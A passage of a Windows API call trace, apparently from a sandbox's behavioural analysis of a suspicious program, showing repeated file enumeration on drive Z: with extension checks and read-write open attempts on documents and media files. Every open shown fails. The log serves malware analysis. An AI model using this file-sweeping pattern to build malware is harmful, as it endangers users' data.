"z:\\ohbamqlyen9icdkg.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.480] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17cec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8epnap.wav", cAlternateFileName="")) returned 1 [0182.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.480] PathFindExtensionW (pszPath="Z:\\8epnap.wav") returned=".wav" [0182.485] CreateFileW (lpFileName="Z:\\8epnap.wav" (normalized: "z:\\8epnap.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.487] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x67e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XhyKggx8pHn779f8mb.swf", cAlternateFileName="")) returned 1 [0182.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.487] PathFindExtensionW (pszPath="Z:\\XhyKggx8pHn779f8mb.swf") returned=".swf" [0182.492] CreateFileW (lpFileName="Z:\\XhyKggx8pHn779f8mb.swf" (normalized: "z:\\xhykggx8phn779f8mb.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.492] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x82d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="l5waVaq5umcw.wav", cAlternateFileName="")) returned 1 [0182.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.493] PathFindExtensionW (pszPath="Z:\\l5waVaq5umcw.wav") returned=".wav" [0182.496] CreateFileW (lpFileName="Z:\\l5waVaq5umcw.wav" (normalized: "z:\\l5wavaq5umcw.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.497] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa870, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gSQ2YGk9scQfUsGUcoij.wav", cAlternateFileName="")) returned 1 [0182.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.497] PathFindExtensionW (pszPath="Z:\\gSQ2YGk9scQfUsGUcoij.wav") returned=".wav" [0182.501] CreateFileW (lpFileName="Z:\\gSQ2YGk9scQfUsGUcoij.wav" (normalized: "z:\\gsq2ygk9scqfusgucoij.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.502] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd55d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H4BFdNII7HeaE.swf", cAlternateFileName="")) returned 1 [0182.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.502] PathFindExtensionW (pszPath="Z:\\H4BFdNII7HeaE.swf") returned=".swf" [0182.506] CreateFileW (lpFileName="Z:\\H4BFdNII7HeaE.swf" (normalized: "z:\\h4bfdnii7heae.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.507] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5b66, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dUSDGqr.odt", cAlternateFileName="")) returned 1 [0182.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.507] PathFindExtensionW (pszPath="Z:\\dUSDGqr.odt") returned=".odt" [0182.510] CreateFileW (lpFileName="Z:\\dUSDGqr.odt" (normalized: "z:\\dusdgqr.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.511] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xeb6f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1qRDSM.ots", cAlternateFileName="")) returned 1 [0182.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.512] PathFindExtensionW (pszPath="Z:\\1qRDSM.ots") returned=".ots" [0182.515] CreateFileW (lpFileName="Z:\\1qRDSM.ots" (normalized: "z:\\1qrdsm.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.517] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc96c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3E3mNRHtjqDkD.docx", cAlternateFileName="")) returned 1 [0182.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.517] PathFindExtensionW (pszPath="Z:\\3E3mNRHtjqDkD.docx") returned=".docx" [0182.520] CreateFileW (lpFileName="Z:\\3E3mNRHtjqDkD.docx" (normalized: "z:\\3e3mnrhtjqdkd.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.522] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13677, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZDi6IHm9Gll50uy.wav", cAlternateFileName="")) returned 1 [0182.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.522] PathFindExtensionW (pszPath="Z:\\ZDi6IHm9Gll50uy.wav") returned=".wav" [0182.526] CreateFileW (lpFileName="Z:\\ZDi6IHm9Gll50uy.wav" (normalized: "z:\\zdi6ihm9gll50uy.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.527] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x151b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nrhycV54UDwXeOVHbaY.ppt", cAlternateFileName="")) returned 1 [0182.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.527] PathFindExtensionW (pszPath="Z:\\nrhycV54UDwXeOVHbaY.ppt") returned=".ppt" [0182.531] CreateFileW (lpFileName="Z:\\nrhycV54UDwXeOVHbaY.ppt" (normalized: "z:\\nrhycv54udwxeovhbay.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.533] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf1b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SVUGEj8tBupVWECY.xls", cAlternateFileName="")) returned 1 [0182.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.533] PathFindExtensionW (pszPath="Z:\\SVUGEj8tBupVWECY.xls") returned=".xls" [0182.537] CreateFileW (lpFileName="Z:\\SVUGEj8tBupVWECY.xls" (normalized: "z:\\svugej8tbupvwecy.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.543] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x145ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ety66.avi", cAlternateFileName="")) returned 1 [0182.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.543] PathFindExtensionW (pszPath="Z:\\Ety66.avi") returned=".avi" [0182.551] CreateFileW (lpFileName="Z:\\Ety66.avi" (normalized: "z:\\ety66.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.553] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17f4f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="quWT4PWu.png", cAlternateFileName="")) returned 1 [0182.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.553] PathFindExtensionW (pszPath="Z:\\quWT4PWu.png") returned=".png" [0182.557] CreateFileW (lpFileName="Z:\\quWT4PWu.png" (normalized: "z:\\quwt4pwu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.559] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x117b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j9JYPCvbXdUa8a9vWWKs.pptx", cAlternateFileName="")) returned 1 [0182.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.559] PathFindExtensionW (pszPath="Z:\\j9JYPCvbXdUa8a9vWWKs.pptx") returned=".pptx" [0182.562] CreateFileW (lpFileName="Z:\\j9JYPCvbXdUa8a9vWWKs.pptx" (normalized: "z:\\j9jypcvbxdua8a9vwwks.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.564] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15446, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Khw7ULNZgmj8e7C.ots", cAlternateFileName="")) returned 1 [0182.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.564] PathFindExtensionW (pszPath="Z:\\Khw7ULNZgmj8e7C.ots") returned=".ots" [0182.568] CreateFileW (lpFileName="Z:\\Khw7ULNZgmj8e7C.ots" (normalized: "z:\\khw7ulnzgmj8e7c.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.575] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13cde, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uKTB42S.swf", cAlternateFileName="")) returned 1 [0182.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.575] PathFindExtensionW (pszPath="Z:\\uKTB42S.swf") returned=".swf" [0182.579] CreateFileW (lpFileName="Z:\\uKTB42S.swf" (normalized: "z:\\uktb42s.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.580] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb0b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c9ePpp.flv", cAlternateFileName="")) returned 1 [0182.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.580] PathFindExtensionW (pszPath="Z:\\c9ePpp.flv") returned=".flv" [0182.584] CreateFileW (lpFileName="Z:\\c9ePpp.flv" (normalized: "z:\\c9eppp.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.586] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13285, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRokYgqilEOKg8Z1jJGf.xlsx", cAlternateFileName="")) returned 1 [0182.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.586] PathFindExtensionW (pszPath="Z:\\TRokYgqilEOKg8Z1jJGf.xlsx") returned=".xlsx" [0182.589] CreateFileW (lpFileName="Z:\\TRokYgqilEOKg8Z1jJGf.xlsx" (normalized: "z:\\trokygqileokg8z1jjgf.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.591] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x99c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="quhItobo4pfIROy.png", cAlternateFileName="")) returned 1 [0182.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.591] PathFindExtensionW (pszPath="Z:\\quhItobo4pfIROy.png") returned=".png" [0182.594] CreateFileW (lpFileName="Z:\\quhItobo4pfIROy.png" (normalized: "z:\\quhitobo4pfiroy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.595] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14269, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TkK2vz7hevOC5xNhwJg.mp4", cAlternateFileName="")) returned 1 [0182.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.595] PathFindExtensionW (pszPath="Z:\\TkK2vz7hevOC5xNhwJg.mp4") returned=".mp4" [0182.599] CreateFileW (lpFileName="Z:\\TkK2vz7hevOC5xNhwJg.mp4" (normalized: "z:\\tkk2vz7hevoc5xnhwjg.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.600] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x163c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8Lx84HE6bsZ.wav", cAlternateFileName="")) returned 1 [0182.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.600] PathFindExtensionW (pszPath="Z:\\8Lx84HE6bsZ.wav") returned=".wav" [0182.604] CreateFileW (lpFileName="Z:\\8Lx84HE6bsZ.wav" (normalized: "z:\\8lx84he6bsz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.606] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1469a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GbsTd6ktJr7.ppt", cAlternateFileName="")) returned 1 [0182.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.606] PathFindExtensionW (pszPath="Z:\\GbsTd6ktJr7.ppt") returned=".ppt" [0182.610] CreateFileW (lpFileName="Z:\\GbsTd6ktJr7.ppt" (normalized: "z:\\gbstd6ktjr7.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.611] 